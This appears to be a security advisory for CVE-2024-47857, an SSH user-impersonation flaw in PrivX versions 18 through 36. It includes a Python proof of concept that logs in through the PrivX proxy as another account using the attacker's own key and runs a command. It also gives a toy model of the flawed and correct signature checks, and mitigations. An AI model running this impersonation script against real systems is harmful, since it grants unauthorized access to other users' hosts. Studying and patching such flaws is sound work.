A critical vulnerability tracked as CVE-2024-47857 has been discovered in PrivX, affecting versions 18 through 36. The flaw is insufficient validation of public key signatures for native SSH connections made through a PrivX proxy port. An attacker who already holds a PrivX account can exploit it to impersonate another PrivX user and gain unauthorized access to the SSH target hosts that the impersonated user is entitled to reach.

Exploit Details

PrivX, the privileged access management product from SSH Communications Security, suffers from an authentication bypass in versions 18 through 36. When a native SSH handshake is established through the SOCKS proxy exposed by PrivX, the software does not adequately validate the public key signature presented during user authentication. This lets an attacker with a valid PrivX account (say "account A") authenticate as a different PrivX user ("account B") and reach the SSH target hosts that "account B" has access to. The attacker does not need "account B"'s private key; the only precondition is a PrivX account of their own and network reachability of the proxy port.

Exploitation can be demonstrated with the following Python snippet, which tunnels through the PrivX proxy claiming the username "accountB" while signing with the attacker's own key:

import paramiko
import sshtunnel

# PrivX proxy endpoint, the attacker's own SSH private key, and the target host
PRIVX_PROXY_HOST = 'proxy.privx.local'
PRIVX_PROXY_PORT = 108
ATTACKER_SSH_KEY = "path/to/attacker/ssh/key"
TARGET_HOST = "target.host.local"
LOCAL_BIND_PORT = 12345

# Load the attacker's key: the authentication request will claim "accountB"
# but be signed with this key, which was never registered for "accountB".
attacker_ssh_key = paramiko.RSAKey.from_private_key_file(ATTACKER_SSH_KEY)
ssh_client = paramiko.SSHClient()
ssh_client.set_missing_host_key_policy(paramiko.AutoAddPolicy())

# Open a tunnel through the PrivX proxy as "accountB" and forward the target's
# SSH port to a local port.
with sshtunnel.open_tunnel(
    (PRIVX_PROXY_HOST, PRIVX_PROXY_PORT),
    ssh_username="accountB",
    ssh_pkey=attacker_ssh_key,
    remote_bind_address=(TARGET_HOST, 22),
    local_bind_address=('localhost', LOCAL_BIND_PORT),
) as tunnel:
    print("Connected to proxy.")
    # Through the forwarded port, log in to the target host as "accountB"
    ssh_client.connect('localhost', port=tunnel.local_bind_port,
                       username="accountB", pkey=attacker_ssh_key)
    print("Connected to target host as account B.")

    # Execute a command on the target host and show whose identity we hold
    stdin, stdout, stderr = ssh_client.exec_command('id')
    print("Executed command, output:", stdout.read().decode("utf-8"))

# Close the session to the target; the tunnel closes when the with-block exits
ssh_client.close()

If the vulnerable proxy accepts the request, the attacker is authenticated as "account B" with a key that was never registered for that account, and every command afterwards runs on a target host that only "account B" is entitled to reach.
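The advisory does not say which internal check PrivX got wrong, so the following is an added, hypothetical model of the class of defect rather than PrivX's own code. It reproduces the signed data of an SSH publickey userauth request (RFC 4252 section 7) with a constructed toy RSA (tiny Mersenne-prime keys, no padding, not secure) and contrasts a check that verifies the signature against whatever key the client sends with one that first requires the key to be registered for the claimed user and then verifies under that registered key. The account names, session ids and authorized-key table are constructed for the demo.

```python
import hashlib
import struct

# Constructed toy RSA (no padding, tiny keys): present only so that the
# signature check below is a genuine asymmetric check, not a placeholder.
def toy_rsa_keypair(p, q, e=65537):
    n, phi = p * q, (p - 1) * (q - 1)
    return (n, e), (n, pow(e, -1, phi))          # (public, private)

def toy_sign(priv, data):
    n, d = priv
    return pow(int.from_bytes(hashlib.sha256(data).digest(), "big") % n, d, n)

def toy_verify(pub, data, sig):
    n, e = pub
    return pow(sig, e, n) == int.from_bytes(hashlib.sha256(data).digest(), "big") % n

# SSH wire encoding (RFC 4251 "string") and the data a publickey userauth
# signature covers (RFC 4252 section 7). The session id binds the signature to
# one handshake; the username binds it to one claimed identity.
SSH_MSG_USERAUTH_REQUEST = 50

def ssh_string(b):
    return struct.pack(">I", len(b)) + b

def pubkey_blob(pub):
    n, e = pub
    n_bytes = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return ssh_string(b"toy-rsa") + ssh_string(e.to_bytes(4, "big")) + ssh_string(n_bytes)

def userauth_signed_data(session_id, username, pub):
    return (ssh_string(session_id) + bytes([SSH_MSG_USERAUTH_REQUEST])
            + ssh_string(username.encode()) + ssh_string(b"ssh-connection")
            + ssh_string(b"publickey") + b"\x01"
            + ssh_string(b"toy-rsa") + ssh_string(pubkey_blob(pub)))

def make_request(session_id, claimed_user, keypair):
    """Client side: claim `claimed_user` and sign with whatever key the client holds."""
    pub, priv = keypair
    sig = toy_sign(priv, userauth_signed_data(session_id, claimed_user, pub))
    return {"user": claimed_user, "pubkey": pub, "sig": sig}

# Insufficient check: the signature is verified under the key *the client sent*,
# so a valid signature by any key authenticates any claimed username.
def verify_insufficient(session_id, req):
    data = userauth_signed_data(session_id, req["user"], req["pubkey"])
    return toy_verify(req["pubkey"], data, req["sig"])

# Sufficient check: the presented key must be registered for the claimed user,
# and the signature must verify under that registered key over data bound to
# this session id and this username.
def verify_strict(session_id, req, authorized_keys):
    presented = pubkey_blob(req["pubkey"])
    registered = [k for k in authorized_keys.get(req["user"], []) if pubkey_blob(k) == presented]
    if not registered:
        return False
    data = userauth_signed_data(session_id, req["user"], req["pubkey"])
    return toy_verify(registered[0], data, req["sig"])

# Constructed scenario: account B's key is registered; the attacker (account A) holds only their own key.
ACCOUNT_B_KEYS = toy_rsa_keypair(2**31 - 1, 2**61 - 1)
ATTACKER_KEYS = toy_rsa_keypair(2**89 - 1, 2**107 - 1)
AUTHORIZED_KEYS = {"accountB": [ACCOUNT_B_KEYS[0]], "accountA": [ATTACKER_KEYS[0]]}

def impersonation_outcome(session_id=b"session-1"):
    """Attacker claims accountB but signs with the attacker key: (insufficient, strict)."""
    req = make_request(session_id, "accountB", ATTACKER_KEYS)
    return verify_insufficient(session_id, req), verify_strict(session_id, req, AUTHORIZED_KEYS)

def legitimate_outcome(session_id=b"session-1"):
    """accountB signs with its own registered key: (insufficient, strict)."""
    req = make_request(session_id, "accountB", ACCOUNT_B_KEYS)
    return verify_insufficient(session_id, req), verify_strict(session_id, req, AUTHORIZED_KEYS)

def replay_outcome():
    """A signature captured in one handshake is rejected in another session."""
    req = make_request(b"session-1", "accountB", ACCOUNT_B_KEYS)
    return verify_strict(b"session-2", req, AUTHORIZED_KEYS)

if __name__ == "__main__":
    print("attacker claiming accountB (insufficient, strict):", impersonation_outcome())
    print("accountB with own key      (insufficient, strict):", legitimate_outcome())
    print("replayed accountB signature, strict check:", replay_outcome())
```

The point of the strict path is that a valid signature proves only possession of the key that made it; authentication requires a second fact, that the key is bound to the claimed identity, and the check must look that binding up on the server side rather than take the client's word for it. The session-id binding is what stops a captured request from being replayed through a later proxy connection.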

Original References

For more details about the vulnerability and its impact, you can refer to the following external links:

1. CVE-2024-47857 - Vulnerability Details

2. IMPACT: PrivX SSH Impersonation and Unauthorized Access - Technical Explanation

Conclusion and Mitigations

CVE-2024-47857 is a critical vulnerability that poses a severe risk to organizations running PrivX versions 18 through 36. Users are strongly advised to upgrade to the latest PrivX release, which is not affected.

Additional mitigations include:

- Restricting access to the PrivX proxy port to authorized clients only, through network-level access control.

- Enabling multi-factor authentication on both PrivX user accounts and SSH target hosts.

- Regularly reviewing user access permissions and target host access control lists (ACLs) to ensure least-privilege access.

Timeline

Published on: 01/31/2025 17:15:14 UTC
Last modified on: 03/18/2025 20:15:24 UTC